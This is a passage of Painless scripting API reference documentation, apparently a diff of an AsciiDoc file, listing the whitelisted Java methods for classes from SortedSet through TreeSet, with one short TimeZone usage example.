-* Comparator 
{java11-javadoc}/java.base/java/util/SortedSet.html#comparator()[comparator]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/Set.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* def {java11-javadoc}/java.base/java/util/SortedSet.html#first()[first]() -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/Set.html#hashCode()[hashCode]() -* SortedSet {java11-javadoc}/java.base/java/util/SortedSet.html#headSet(java.lang.Object)[headSet](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* def {java11-javadoc}/java.base/java/util/SortedSet.html#last()[last]() -* boolean {java11-javadoc}/java.base/java/util/Set.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* SortedSet {java11-javadoc}/java.base/java/util/SortedSet.html#subSet(java.lang.Object,java.lang.Object)[subSet](def, def) -* double sum() -* double sum(ToDoubleFunction) -* SortedSet {java11-javadoc}/java.base/java/util/SortedSet.html#tailSet(java.lang.Object)[tailSet](def) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Spliterator]] -==== Spliterator -* static int {java11-javadoc}/java.base/java/util/Spliterator.html#CONCURRENT[CONCURRENT] -* static int {java11-javadoc}/java.base/java/util/Spliterator.html#DISTINCT[DISTINCT] -* static int {java11-javadoc}/java.base/java/util/Spliterator.html#IMMUTABLE[IMMUTABLE] -* static int {java11-javadoc}/java.base/java/util/Spliterator.html#NONNULL[NONNULL] -* static int {java11-javadoc}/java.base/java/util/Spliterator.html#ORDERED[ORDERED] -* static int {java11-javadoc}/java.base/java/util/Spliterator.html#SIZED[SIZED] -* static int {java11-javadoc}/java.base/java/util/Spliterator.html#SORTED[SORTED] -* static int {java11-javadoc}/java.base/java/util/Spliterator.html#SUBSIZED[SUBSIZED] -* int {java11-javadoc}/java.base/java/util/Spliterator.html#characteristics()[characteristics]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long 
{java11-javadoc}/java.base/java/util/Spliterator.html#estimateSize()[estimateSize]() -* void {java11-javadoc}/java.base/java/util/Spliterator.html#forEachRemaining(java.util.function.Consumer)[forEachRemaining](Consumer) -* Comparator {java11-javadoc}/java.base/java/util/Spliterator.html#getComparator()[getComparator]() -* long {java11-javadoc}/java.base/java/util/Spliterator.html#getExactSizeIfKnown()[getExactSizeIfKnown]() -* boolean {java11-javadoc}/java.base/java/util/Spliterator.html#hasCharacteristics(int)[hasCharacteristics](int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* boolean {java11-javadoc}/java.base/java/util/Spliterator.html#tryAdvance(java.util.function.Consumer)[tryAdvance](Consumer) -* Spliterator {java11-javadoc}/java.base/java/util/Spliterator.html#trySplit()[trySplit]() - - -[[painless-api-reference-shared-Spliterator-OfDouble]] -==== Spliterator.OfDouble -* int {java11-javadoc}/java.base/java/util/Spliterator.html#characteristics()[characteristics]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long {java11-javadoc}/java.base/java/util/Spliterator.html#estimateSize()[estimateSize]() -* void {java11-javadoc}/java.base/java/util/Spliterator$OfPrimitive.html#forEachRemaining(java.lang.Object)[forEachRemaining](def) -* Comparator {java11-javadoc}/java.base/java/util/Spliterator.html#getComparator()[getComparator]() -* long {java11-javadoc}/java.base/java/util/Spliterator.html#getExactSizeIfKnown()[getExactSizeIfKnown]() -* boolean {java11-javadoc}/java.base/java/util/Spliterator.html#hasCharacteristics(int)[hasCharacteristics](int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* boolean {java11-javadoc}/java.base/java/util/Spliterator$OfPrimitive.html#tryAdvance(java.lang.Object)[tryAdvance](def) -* Spliterator.OfDouble {java11-javadoc}/java.base/java/util/Spliterator$OfDouble.html#trySplit()[trySplit]() - - -[[painless-api-reference-shared-Spliterator-OfInt]] -==== Spliterator.OfInt -* int {java11-javadoc}/java.base/java/util/Spliterator.html#characteristics()[characteristics]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long {java11-javadoc}/java.base/java/util/Spliterator.html#estimateSize()[estimateSize]() -* void {java11-javadoc}/java.base/java/util/Spliterator$OfPrimitive.html#forEachRemaining(java.lang.Object)[forEachRemaining](def) -* Comparator {java11-javadoc}/java.base/java/util/Spliterator.html#getComparator()[getComparator]() -* long {java11-javadoc}/java.base/java/util/Spliterator.html#getExactSizeIfKnown()[getExactSizeIfKnown]() -* boolean {java11-javadoc}/java.base/java/util/Spliterator.html#hasCharacteristics(int)[hasCharacteristics](int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* boolean {java11-javadoc}/java.base/java/util/Spliterator$OfPrimitive.html#tryAdvance(java.lang.Object)[tryAdvance](def) -* Spliterator.OfInt {java11-javadoc}/java.base/java/util/Spliterator$OfInt.html#trySplit()[trySplit]() - - -[[painless-api-reference-shared-Spliterator-OfLong]] -==== Spliterator.OfLong -* int {java11-javadoc}/java.base/java/util/Spliterator.html#characteristics()[characteristics]() -* boolean 
{java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long {java11-javadoc}/java.base/java/util/Spliterator.html#estimateSize()[estimateSize]() -* void {java11-javadoc}/java.base/java/util/Spliterator$OfPrimitive.html#forEachRemaining(java.lang.Object)[forEachRemaining](def) -* Comparator {java11-javadoc}/java.base/java/util/Spliterator.html#getComparator()[getComparator]() -* long {java11-javadoc}/java.base/java/util/Spliterator.html#getExactSizeIfKnown()[getExactSizeIfKnown]() -* boolean {java11-javadoc}/java.base/java/util/Spliterator.html#hasCharacteristics(int)[hasCharacteristics](int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* boolean {java11-javadoc}/java.base/java/util/Spliterator$OfPrimitive.html#tryAdvance(java.lang.Object)[tryAdvance](def) -* Spliterator.OfLong {java11-javadoc}/java.base/java/util/Spliterator$OfLong.html#trySplit()[trySplit]() - - -[[painless-api-reference-shared-Spliterator-OfPrimitive]] -==== Spliterator.OfPrimitive -* int {java11-javadoc}/java.base/java/util/Spliterator.html#characteristics()[characteristics]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long {java11-javadoc}/java.base/java/util/Spliterator.html#estimateSize()[estimateSize]() -* void {java11-javadoc}/java.base/java/util/Spliterator$OfPrimitive.html#forEachRemaining(java.lang.Object)[forEachRemaining](def) -* Comparator {java11-javadoc}/java.base/java/util/Spliterator.html#getComparator()[getComparator]() -* long {java11-javadoc}/java.base/java/util/Spliterator.html#getExactSizeIfKnown()[getExactSizeIfKnown]() -* boolean {java11-javadoc}/java.base/java/util/Spliterator.html#hasCharacteristics(int)[hasCharacteristics](int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* boolean {java11-javadoc}/java.base/java/util/Spliterator$OfPrimitive.html#tryAdvance(java.lang.Object)[tryAdvance](def) -* Spliterator.OfPrimitive {java11-javadoc}/java.base/java/util/Spliterator$OfPrimitive.html#trySplit()[trySplit]() - - -[[painless-api-reference-shared-Spliterators]] -==== Spliterators -* static Spliterator.OfDouble {java11-javadoc}/java.base/java/util/Spliterators.html#emptyDoubleSpliterator()[emptyDoubleSpliterator]() -* static Spliterator.OfInt {java11-javadoc}/java.base/java/util/Spliterators.html#emptyIntSpliterator()[emptyIntSpliterator]() -* static Spliterator.OfLong {java11-javadoc}/java.base/java/util/Spliterators.html#emptyLongSpliterator()[emptyLongSpliterator]() -* static Spliterator {java11-javadoc}/java.base/java/util/Spliterators.html#emptySpliterator()[emptySpliterator]() -* static Iterator {java11-javadoc}/java.base/java/util/Spliterators.html#iterator(java.util.Spliterator)[iterator](Spliterator) -* static Spliterator {java11-javadoc}/java.base/java/util/Spliterators.html#spliterator(java.util.Collection,int)[spliterator](Collection, int) -* static Spliterator {java11-javadoc}/java.base/java/util/Spliterators.html#spliterator(java.util.Iterator,long,int)[spliterator](Iterator, long, int) -* static Spliterator {java11-javadoc}/java.base/java/util/Spliterators.html#spliteratorUnknownSize(java.util.Iterator,int)[spliteratorUnknownSize](Iterator, int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int 
{java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Stack]] -==== Stack -* {java11-javadoc}/java.base/java/util/Stack.html#()[Stack]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* void {java11-javadoc}/java.base/java/util/Vector.html#addElement(java.lang.Object)[addElement](def) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* def {java11-javadoc}/java.base/java/util/Vector.html#clone()[clone]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* void {java11-javadoc}/java.base/java/util/Vector.html#copyInto(java.lang.Object%5B%5D)[copyInto](Object[]) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* def {java11-javadoc}/java.base/java/util/Vector.html#elementAt(int)[elementAt](int) -* Enumeration {java11-javadoc}/java.base/java/util/Vector.html#elements()[elements]() -* boolean {java11-javadoc}/java.base/java/util/Stack.html#empty()[empty]() -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* def {java11-javadoc}/java.base/java/util/Vector.html#firstElement()[firstElement]() -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* def {java11-javadoc}/java.base/java/util/List.html#get(int)[get](int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* void {java11-javadoc}/java.base/java/util/Vector.html#insertElementAt(java.lang.Object,int)[insertElementAt](def, int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* def {java11-javadoc}/java.base/java/util/Vector.html#lastElement()[lastElement]() -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* int {java11-javadoc}/java.base/java/util/Vector.html#lastIndexOf(java.lang.Object,int)[lastIndexOf](def, int) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/Stack.html#peek()[peek]() -* def {java11-javadoc}/java.base/java/util/Stack.html#pop()[pop]() -* def 
{java11-javadoc}/java.base/java/util/Stack.html#push(java.lang.Object)[push](def) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* void {java11-javadoc}/java.base/java/util/Vector.html#removeAllElements()[removeAllElements]() -* boolean {java11-javadoc}/java.base/java/util/Vector.html#removeElement(java.lang.Object)[removeElement](def) -* void {java11-javadoc}/java.base/java/util/Vector.html#removeElementAt(int)[removeElementAt](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Stack.html#search(java.lang.Object)[search](def) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* void {java11-javadoc}/java.base/java/util/Vector.html#setElementAt(java.lang.Object,int)[setElementAt](def, int) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-StringJoiner]] -==== StringJoiner -* {java11-javadoc}/java.base/java/util/StringJoiner.html#(java.lang.CharSequence)[StringJoiner](CharSequence) -* {java11-javadoc}/java.base/java/util/StringJoiner.html#(java.lang.CharSequence,java.lang.CharSequence,java.lang.CharSequence)[StringJoiner](CharSequence, CharSequence, CharSequence) -* StringJoiner {java11-javadoc}/java.base/java/util/StringJoiner.html#add(java.lang.CharSequence)[add](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/StringJoiner.html#length()[length]() -* StringJoiner {java11-javadoc}/java.base/java/util/StringJoiner.html#merge(java.util.StringJoiner)[merge](StringJoiner) -* StringJoiner {java11-javadoc}/java.base/java/util/StringJoiner.html#setEmptyValue(java.lang.CharSequence)[setEmptyValue](CharSequence) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-StringTokenizer]] -==== StringTokenizer -* {java11-javadoc}/java.base/java/util/StringTokenizer.html#(java.lang.String)[StringTokenizer](null) -* {java11-javadoc}/java.base/java/util/StringTokenizer.html#(java.lang.String,java.lang.String)[StringTokenizer](null, null) -* 
{java11-javadoc}/java.base/java/util/StringTokenizer.html#(java.lang.String,java.lang.String,boolean)[StringTokenizer](null, null, boolean) -* int {java11-javadoc}/java.base/java/util/StringTokenizer.html#countTokens()[countTokens]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/util/Enumeration.html#hasMoreElements()[hasMoreElements]() -* boolean {java11-javadoc}/java.base/java/util/StringTokenizer.html#hasMoreTokens()[hasMoreTokens]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* def {java11-javadoc}/java.base/java/util/Enumeration.html#nextElement()[nextElement]() -* null {java11-javadoc}/java.base/java/util/StringTokenizer.html#nextToken()[nextToken]() -* null {java11-javadoc}/java.base/java/util/StringTokenizer.html#nextToken(java.lang.String)[nextToken](null) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-TimeZone]] -==== TimeZone -* static int {java11-javadoc}/java.base/java/util/TimeZone.html#LONG[LONG] -* static int {java11-javadoc}/java.base/java/util/TimeZone.html#SHORT[SHORT] -* static null[] {java11-javadoc}/java.base/java/util/TimeZone.html#getAvailableIDs()[getAvailableIDs]() -* static null[] {java11-javadoc}/java.base/java/util/TimeZone.html#getAvailableIDs(int)[getAvailableIDs](int) -* static TimeZone {java11-javadoc}/java.base/java/util/TimeZone.html#getDefault()[getDefault]() -* static TimeZone {java11-javadoc}/java.base/java/util/TimeZone.html#getTimeZone(java.lang.String)[getTimeZone](null) -* def {java11-javadoc}/java.base/java/util/TimeZone.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/util/TimeZone.html#getDSTSavings()[getDSTSavings]() -* null {java11-javadoc}/java.base/java/util/TimeZone.html#getDisplayName()[getDisplayName]() -* null {java11-javadoc}/java.base/java/util/TimeZone.html#getDisplayName(java.util.Locale)[getDisplayName](Locale) -* null {java11-javadoc}/java.base/java/util/TimeZone.html#getDisplayName(boolean,int)[getDisplayName](boolean, int) -* null {java11-javadoc}/java.base/java/util/TimeZone.html#getDisplayName(boolean,int,java.util.Locale)[getDisplayName](boolean, int, Locale) -* null {java11-javadoc}/java.base/java/util/TimeZone.html#getID()[getID]() -* int {java11-javadoc}/java.base/java/util/TimeZone.html#getOffset(long)[getOffset](long) -* int {java11-javadoc}/java.base/java/util/TimeZone.html#getOffset(int,int,int,int,int,int)[getOffset](int, int, int, int, int, int) -* int {java11-javadoc}/java.base/java/util/TimeZone.html#getRawOffset()[getRawOffset]() -* boolean {java11-javadoc}/java.base/java/util/TimeZone.html#hasSameRules(java.util.TimeZone)[hasSameRules](TimeZone) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/TimeZone.html#inDaylightTime(java.util.Date)[inDaylightTime](Date) -* boolean {java11-javadoc}/java.base/java/util/TimeZone.html#observesDaylightTime()[observesDaylightTime]() -* void {java11-javadoc}/java.base/java/util/TimeZone.html#setRawOffset(int)[setRawOffset](int) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* ZoneId {java11-javadoc}/java.base/java/util/TimeZone.html#toZoneId()[toZoneId]() -* boolean {java11-javadoc}/java.base/java/util/TimeZone.html#useDaylightTime()[useDaylightTime]() - - 
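As a quick illustration of the `TimeZone` methods listed above, a minimal Painless sketch (the zone ID `"Europe/Paris"` is only an illustrative value) might look like:

[source,painless]
----
// Look up a zone by ID and inspect it with the whitelisted TimeZone methods
TimeZone tz = TimeZone.getTimeZone("Europe/Paris");
boolean dst = tz.useDaylightTime();   // does the zone observe DST at all?
int offsetMillis = tz.getRawOffset(); // raw UTC offset in milliseconds
ZoneId zone = tz.toZoneId();          // bridge into the java.time API
----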
-[[painless-api-reference-shared-TooManyListenersException]] -==== TooManyListenersException -* {java11-javadoc}/java.base/java/util/TooManyListenersException.html#()[TooManyListenersException]() -* {java11-javadoc}/java.base/java/util/TooManyListenersException.html#(java.lang.String)[TooManyListenersException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-TreeMap]] -==== TreeMap -* {java11-javadoc}/java.base/java/util/TreeMap.html#()[TreeMap]() -* {java11-javadoc}/java.base/java/util/TreeMap.html#(java.util.Comparator)[TreeMap](Comparator) -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#ceilingEntry(java.lang.Object)[ceilingEntry](def) -* def {java11-javadoc}/java.base/java/util/NavigableMap.html#ceilingKey(java.lang.Object)[ceilingKey](def) -* void {java11-javadoc}/java.base/java/util/Map.html#clear()[clear]() -* def {java11-javadoc}/java.base/java/util/TreeMap.html#clone()[clone]() -* List collect(BiFunction) -* def collect(Collection, BiFunction) -* Comparator {java11-javadoc}/java.base/java/util/SortedMap.html#comparator()[comparator]() -* def {java11-javadoc}/java.base/java/util/Map.html#compute(java.lang.Object,java.util.function.BiFunction)[compute](def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfAbsent(java.lang.Object,java.util.function.Function)[computeIfAbsent](def, Function) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfPresent(java.lang.Object,java.util.function.BiFunction)[computeIfPresent](def, BiFunction) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsKey(java.lang.Object)[containsKey](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsValue(java.lang.Object)[containsValue](def) -* int count(BiPredicate) -* NavigableSet {java11-javadoc}/java.base/java/util/NavigableMap.html#descendingKeySet()[descendingKeySet]() -* NavigableMap {java11-javadoc}/java.base/java/util/NavigableMap.html#descendingMap()[descendingMap]() -* def each(BiConsumer) -* Set {java11-javadoc}/java.base/java/util/Map.html#entrySet()[entrySet]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#equals(java.lang.Object)[equals](Object) -* boolean every(BiPredicate) -* Map.Entry find(BiPredicate) -* Map findAll(BiPredicate) -* def findResult(BiFunction) -* def findResult(def, BiFunction) -* List findResults(BiFunction) -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#firstEntry()[firstEntry]() -* def {java11-javadoc}/java.base/java/util/SortedMap.html#firstKey()[firstKey]() -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#floorEntry(java.lang.Object)[floorEntry](def) -* def {java11-javadoc}/java.base/java/util/NavigableMap.html#floorKey(java.lang.Object)[floorKey](def) -* void {java11-javadoc}/java.base/java/util/Map.html#forEach(java.util.function.BiConsumer)[forEach](BiConsumer) -* def {java11-javadoc}/java.base/java/util/Map.html#get(java.lang.Object)[get](def) -* Object getByPath(null) -* Object getByPath(null, 
Object) -* def {java11-javadoc}/java.base/java/util/Map.html#getOrDefault(java.lang.Object,java.lang.Object)[getOrDefault](def, def) -* Map groupBy(BiFunction) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* SortedMap {java11-javadoc}/java.base/java/util/SortedMap.html#headMap(java.lang.Object)[headMap](def) -* NavigableMap {java11-javadoc}/java.base/java/util/NavigableMap.html#headMap(java.lang.Object,boolean)[headMap](def, boolean) -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#higherEntry(java.lang.Object)[higherEntry](def) -* def {java11-javadoc}/java.base/java/util/NavigableMap.html#higherKey(java.lang.Object)[higherKey](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#isEmpty()[isEmpty]() -* Set {java11-javadoc}/java.base/java/util/Map.html#keySet()[keySet]() -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#lastEntry()[lastEntry]() -* def {java11-javadoc}/java.base/java/util/SortedMap.html#lastKey()[lastKey]() -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#lowerEntry(java.lang.Object)[lowerEntry](def) -* def {java11-javadoc}/java.base/java/util/Map.html#merge(java.lang.Object,java.lang.Object,java.util.function.BiFunction)[merge](def, def, BiFunction) -* NavigableSet {java11-javadoc}/java.base/java/util/NavigableMap.html#navigableKeySet()[navigableKeySet]() -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#pollFirstEntry()[pollFirstEntry]() -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#pollLastEntry()[pollLastEntry]() -* def {java11-javadoc}/java.base/java/util/Map.html#put(java.lang.Object,java.lang.Object)[put](def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#putAll(java.util.Map)[putAll](Map) -* def {java11-javadoc}/java.base/java/util/Map.html#putIfAbsent(java.lang.Object,java.lang.Object)[putIfAbsent](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object,java.lang.Object)[remove](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object)[replace](def, def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object,java.lang.Object)[replace](def, def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#replaceAll(java.util.function.BiFunction)[replaceAll](BiFunction) -* int {java11-javadoc}/java.base/java/util/Map.html#size()[size]() -* SortedMap {java11-javadoc}/java.base/java/util/SortedMap.html#subMap(java.lang.Object,java.lang.Object)[subMap](def, def) -* NavigableMap {java11-javadoc}/java.base/java/util/NavigableMap.html#subMap(java.lang.Object,boolean,java.lang.Object,boolean)[subMap](def, boolean, def, boolean) -* SortedMap {java11-javadoc}/java.base/java/util/SortedMap.html#tailMap(java.lang.Object)[tailMap](def) -* NavigableMap {java11-javadoc}/java.base/java/util/NavigableMap.html#tailMap(java.lang.Object,boolean)[tailMap](def, boolean) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* Collection {java11-javadoc}/java.base/java/util/Map.html#values()[values]() - - -[[painless-api-reference-shared-TreeSet]] -==== TreeSet -* {java11-javadoc}/java.base/java/util/TreeSet.html#()[TreeSet]() -* {java11-javadoc}/java.base/java/util/TreeSet.html#(java.util.Comparator)[TreeSet](Comparator) -* boolean 
{java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* def {java11-javadoc}/java.base/java/util/NavigableSet.html#ceiling(java.lang.Object)[ceiling](def) -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* def {java11-javadoc}/java.base/java/util/TreeSet.html#clone()[clone]() -* List collect(Function) -* def collect(Collection, Function) -* Comparator {java11-javadoc}/java.base/java/util/SortedSet.html#comparator()[comparator]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* Iterator {java11-javadoc}/java.base/java/util/NavigableSet.html#descendingIterator()[descendingIterator]() -* NavigableSet {java11-javadoc}/java.base/java/util/NavigableSet.html#descendingSet()[descendingSet]() -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/Set.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* def {java11-javadoc}/java.base/java/util/SortedSet.html#first()[first]() -* def {java11-javadoc}/java.base/java/util/NavigableSet.html#floor(java.lang.Object)[floor](def) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/Set.html#hashCode()[hashCode]() -* SortedSet {java11-javadoc}/java.base/java/util/SortedSet.html#headSet(java.lang.Object)[headSet](def) -* NavigableSet {java11-javadoc}/java.base/java/util/NavigableSet.html#headSet(java.lang.Object,boolean)[headSet](def, boolean) -* def {java11-javadoc}/java.base/java/util/NavigableSet.html#higher(java.lang.Object)[higher](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* def {java11-javadoc}/java.base/java/util/SortedSet.html#last()[last]() -* def {java11-javadoc}/java.base/java/util/NavigableSet.html#lower(java.lang.Object)[lower](def) -* def {java11-javadoc}/java.base/java/util/NavigableSet.html#pollFirst()[pollFirst]() -* def {java11-javadoc}/java.base/java/util/NavigableSet.html#pollLast()[pollLast]() -* boolean {java11-javadoc}/java.base/java/util/Set.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean 